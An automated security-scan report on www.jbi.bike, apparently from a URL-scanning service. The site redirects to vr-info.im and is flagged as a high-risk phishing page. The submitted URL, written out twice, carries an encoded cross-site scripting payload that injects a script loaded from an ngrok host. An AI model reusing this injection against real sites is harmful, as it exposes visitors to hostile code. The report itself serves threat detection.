Security Scan Report: www.jbi.bike

Redirected to: https://vr-info.im/spr/

Submitted: Nov 26, 2025, 1:05:59 AMCompleted: Nov 26, 2025, 1:08:06 AMpubliccompleted
Loading additional data...

Summary

This website contacted 31 IPs in 2 countries across 9 domains to perform 43 HTTP transactions. The main domain is vr-info.im.

Submitted URL: https://www.jbi.bike/site/search_brand.php?c1=WALD+PRODUCTS%22%2F%3E%3Cscript+src%3D%22https%3A%2F%2Fkawaski.ngrok.app%2Findex1.js%22%3E%3C%2Fscript%3E

Effective URL: https://vr-info.im/spr/Redirected

AI Security Verdict

High Risk

Confidence: 92%

8
Risk Score

Site is flagged as a phishing page; do not trust or use it.

Risk Factors
Cloudflare phishing warning (strong indicator of malicious intent)
Unranked, likely newly registered domain (low reputation)
Redirect to a different domain (vr-info.im) with no clear purpose
External script loaded from an ngrok subdomain (potentially malicious payload)
Domain age information unavailable

Details

Bot Protection Detected

This website is protected by Cloudflare bot protection. Our scanner was challenged or blocked during access.

Page Title

Suspected phishing site | Cloudflare

Scan Type

public

Language

🇺🇸

English

(80% confidence)

Category

phishing scam

(86%)

Domain Information

The domain name 'www.jbi.bike' uses the .bike top-level domain with subdomain 'www'. Count 3 characters in 'jbi' with 1 vowel and two consonants. Tokenizing the label suggests 2 words: j, bi. Median word length comes out to 1.5 characters. No strong language cues emerged from the frequency lists.

Screenshot

Security scan screenshot of https://www.jbi.bike/site/search_brand.php?c1=WALD+PRODUCTS%22%2F%3E%3Cscript+src%3D%22https%3A%2F%2Fkawaski.ngrok.app%2Findex1.js%22%3E%3C%2Fscript%3E

Page Load Overview

1.66s
Total Load Time
43
HTTP Requests
9
Domains
460 KB
Total Size

Language Analysis

Primary Language

🇺🇸English
Code: en
Confidence:80%
Script:Latin
Direction:ltr

Detection Details

Language Code:en
Detection Confidence:80%
Script Type:Latin
HTML Lang Attribute:en-US
Text Length:395 chars
Detector Agreement:100%

Website Classification

Primary Category

phishing scam86% confidence
Type: dynamic
Method: ml+structural

All Detected Categories

phishing scam
86%
technology software
26%

Detected Features

No structural features detected

Domain & IP Information

RequestsIP AddressLocationAS Autonomous System
1312.165.101.81Miami, Florida, United States
AS7018ATT-INTERNET4
6104.18.95.41United States
AS13335CLOUDFLARENET
4172.67.219.19United States
AS13335CLOUDFLARENET
4142.250.181.234United States
AS15169GOOGLE
4104.18.10.207United States
AS13335CLOUDFLARENET
2142.250.186.131United States
AS15169GOOGLE
1104.18.11.207United States
AS13335CLOUDFLARENET
1104.21.78.90United States
AS13335CLOUDFLARENET
13.74.185.74Frankfurt am Main, Hesse, Germany
AS16509AMAZON-02
1104.18.94.41United States
AS13335CLOUDFLARENET
4331--

Content Similarity HashesFor malware variant detection

Image Hashes

Perceptual Hashes

Average Hash:ff8787ffe7e7ffff
Perceptual Hash:b8389cc7c7c7243c
Difference Hash:203c3c1004040000
Wavelet Hash:9c848080c3c3ffff
Color Hash:#7aac53

Other Hashes

Crop Resistant:203c3c1004040000

Scan History

Scan history not available

Unable to load historical scan data